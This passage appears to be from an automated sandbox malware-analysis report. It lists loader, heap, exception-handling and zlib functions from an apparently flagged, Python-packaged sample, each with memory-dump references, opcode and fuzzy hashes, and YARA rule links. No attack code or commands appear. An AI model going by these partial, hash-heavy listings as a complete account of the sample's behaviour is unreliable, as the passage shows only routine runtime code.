                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                    • Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                    • Instruction ID: 34be571ed70018cc70efd49e67833fe27543d6cd3aa336a63277aa2158903c60
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7F01862161974140E905FB5E590116AE6A5BFA6FE0F8C4631DF6C17BEEEE7CD401C310
                                                                                                                                                                                                                                    Function 00007FF7B2B77EFC Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                    • Opcode ID: eb4e03bbc0b04cbc85d5aa4284f536322b5632f0a5d263bd1b62b358e696f9c3
                                                                                                                                                                                                                                    • Instruction ID: fd310cb149c08ca697b2bfcff6a53d74a4bca868b333baa7257732b9585b0a45
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eb4e03bbc0b04cbc85d5aa4284f536322b5632f0a5d263bd1b62b358e696f9c3
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CC015B20E1F68240FA937A2D564117BE190AF637A0FD44635EB1C4A6EEFFACA441D220
                                                                                                                                                                                                                                    Function 00007FF7B2B78238 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                    • Opcode ID: 3541b91b086c77dfe17527b78ee7977ece0d5fdea915d925a3ffaee66e22a6c2
                                                                                                                                                                                                                                    • Instruction ID: c3109d0deeb654fa35a07abdbdaf4296ae0c75a2cd3ee1933f93876f180c950f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3541b91b086c77dfe17527b78ee7977ece0d5fdea915d925a3ffaee66e22a6c2
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BEE0B650E1E60686FA573AAC45821BAA5309FB7341FC04934EB490A2FBFDAC6C45E631
                                                                                                                                                                                                                                    Function 00007FF7B2B7EB98 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(?,?,00000000,00007FF7B2B7B32A,?,?,?,00007FF7B2B74F11,?,?,?,?,00007FF7B2B7A48A), ref: 00007FF7B2B7EBED
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AllocHeap
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 4292702814-0
                                                                                                                                                                                                                                    • Opcode ID: 0190c006dd090f1dc8136ef035d08a675b61e1fdbed98732a32380f018d60316
                                                                                                                                                                                                                                    • Instruction ID: 550a48952a8c9b6350f67f4efb15f6b5169d774f4295031e9e57e5d9e25d1967
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0190c006dd090f1dc8136ef035d08a675b61e1fdbed98732a32380f018d60316
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 36F04F54B0B20240FE5B766D58952B696D05FABB40FC85530CB0F8A3EAFD9CA482C232
                                                                                                                                                                                                                                    Function 00007FF7B2B7D5FC Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(?,?,?,00007FF7B2B70C90,?,?,?,00007FF7B2B722FA,?,?,?,?,?,00007FF7B2B73AE9), ref: 00007FF7B2B7D63A
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AllocHeap
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 4292702814-0
                                                                                                                                                                                                                                    • Opcode ID: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                                                                                                                                                    • Instruction ID: 5e07107eec4320a1f9bd7af0575cbdefb07424cbd607d856506c897e028c0d8c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 36F03A11A0B24344FE563A7D580127691904FA67E0F880630DE2E852EAFEACE480C530

                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                    Function 00007FF7B2B65830 Relevance: 229.6, APIs: 86, Strings: 45, Instructions: 400libraryloaderCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00007FF7B2B664CF,?,00007FF7B2B6336E), ref: 00007FF7B2B65840
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00007FF7B2B664CF,?,00007FF7B2B6336E), ref: 00007FF7B2B65852
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00007FF7B2B664CF,?,00007FF7B2B6336E), ref: 00007FF7B2B65889
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00007FF7B2B664CF,?,00007FF7B2B6336E), ref: 00007FF7B2B6589B
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00007FF7B2B664CF,?,00007FF7B2B6336E), ref: 00007FF7B2B658B4
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00007FF7B2B664CF,?,00007FF7B2B6336E), ref: 00007FF7B2B658C6
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00007FF7B2B664CF,?,00007FF7B2B6336E), ref: 00007FF7B2B658DF
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00007FF7B2B664CF,?,00007FF7B2B6336E), ref: 00007FF7B2B658F1
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00007FF7B2B664CF,?,00007FF7B2B6336E), ref: 00007FF7B2B6590D
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00007FF7B2B664CF,?,00007FF7B2B6336E), ref: 00007FF7B2B6591F
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00007FF7B2B664CF,?,00007FF7B2B6336E), ref: 00007FF7B2B6593B
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00007FF7B2B664CF,?,00007FF7B2B6336E), ref: 00007FF7B2B6594D
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00007FF7B2B664CF,?,00007FF7B2B6336E), ref: 00007FF7B2B65969
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00007FF7B2B664CF,?,00007FF7B2B6336E), ref: 00007FF7B2B6597B
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00007FF7B2B664CF,?,00007FF7B2B6336E), ref: 00007FF7B2B65997
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00007FF7B2B664CF,?,00007FF7B2B6336E), ref: 00007FF7B2B659A9
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00007FF7B2B664CF,?,00007FF7B2B6336E), ref: 00007FF7B2B659C5
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00007FF7B2B664CF,?,00007FF7B2B6336E), ref: 00007FF7B2B659D7
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                    • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                                    • API String ID: 199729137-653951865
                                                                                                                                                                                                                                    • Opcode ID: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                                                                                                                                                                    • Instruction ID: 701af5d0c143e995898abab08c8a349a921f5af527b45c509775187fd362502a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1622BB6491BB0781FA47BB6CA858976E260BF37740BD41139C61E856ACBFFCB058D324
                                                                                                                                                                                                                                    Function 00007FF7B2B840AC Relevance: 24.0, APIs: 9, Strings: 4, Instructions: 1226COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                                                                                                                                                                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                    • API String ID: 808467561-2761157908
                                                                                                                                                                                                                                    • Opcode ID: 7da0388417e7c773b0aab48e07e342724827a26e5879d16e5decf6c79e081c8c
                                                                                                                                                                                                                                    • Instruction ID: 7fd6759aafb46b8d950279d95b89b33247330f09e08073299e373072a8425e5d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7da0388417e7c773b0aab48e07e342724827a26e5879d16e5decf6c79e081c8c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F8B2FB72A192824BE72A9E68D4447FEB7B1FB65344F805139DB0D5BA8CEF78A500CB50
                                                                                                                                                                                                                                    Function 00007FF7B2B6ACAD Relevance: 12.0, Strings: 9, Instructions: 744COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
                                                                                                                                                                                                                                    • API String ID: 0-2665694366
                                                                                                                                                                                                                                    • Opcode ID: 55880860ec2df9374ed9e05eb7c1f9660e2769407a38999da05ffb99d6c3dc89
                                                                                                                                                                                                                                    • Instruction ID: a1768cfe41a0582d20a70dc1e5820836e710beb5b8b9d2ee18839cfa3fddf3b2
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 55880860ec2df9374ed9e05eb7c1f9660e2769407a38999da05ffb99d6c3dc89
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E4522672A156A64BDB969F18C458BBEBBA9FB55340F414138E74A937C8EF7CD800CB10
                                                                                                                                                                                                                                    Function 00007FF7B2B6D12C Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3140674995-0
                                                                                                                                                                                                                                    • Opcode ID: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                                                                                                                                                                    • Instruction ID: 813650037018439056f3b81bc7c901320c46dfa1dd6a3eb00dff68d4ea121cde
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B5315072609B8586EB619F64E8447EEB360FB95704F444039DB4D47B99EFB8C148C714
                                                                                                                                                                                                                                    Function 00007FF7B2B7A614 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1239891234-0
                                                                                                                                                                                                                                    • Opcode ID: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                                                                                                                                                    • Instruction ID: bbd655453336a66547e5bc006f66ef3d1000e4163d73a65bd08ad38ee6804c87
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8C319232609B8185DB61DF28E8442AFB3A4FB99754F940139EB8D47B69EF7CC145CB10
                                                                                                                                                                                                                                    Function 00007FF7B2B81874 Relevance: 7.8, APIs: 5, Instructions: 282COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2227656907-0
                                                                                                                                                                                                                                    • Opcode ID: ee5daded1920a45b930385d49f4c9fb7106de6f00b6358014c2482279c1420ad
                                                                                                                                                                                                                                    • Instruction ID: 13ccb4e757b9ffc75b4e9254fceb4d906dead93338128e98766b9dfeed2499e7
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ee5daded1920a45b930385d49f4c9fb7106de6f00b6358014c2482279c1420ad
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E2B1CB21B2B68241EA52BB2DD4081BBE350EB66BE4F844135DB5D4B79DFEBCE441C320
                                                                                                                                                                                                                                    Function 00007FF7B2B6D010 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2933794660-0
                                                                                                                                                                                                                                    • Opcode ID: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                                                                                                                                                                    • Instruction ID: 308713a4da5d1685d92c0d5a605287c72b7bd8d538c7cec2ed417b4e8e4fdc96
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6E118F22B15B05C9EB009F74E8452BA73A0F72A718F440E35DB5D86768EF78D055C350
                                                                                                                                                                                                                                    Function 00007FF7B2B83C10 Relevance: 4.8, APIs: 3, Instructions: 340COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
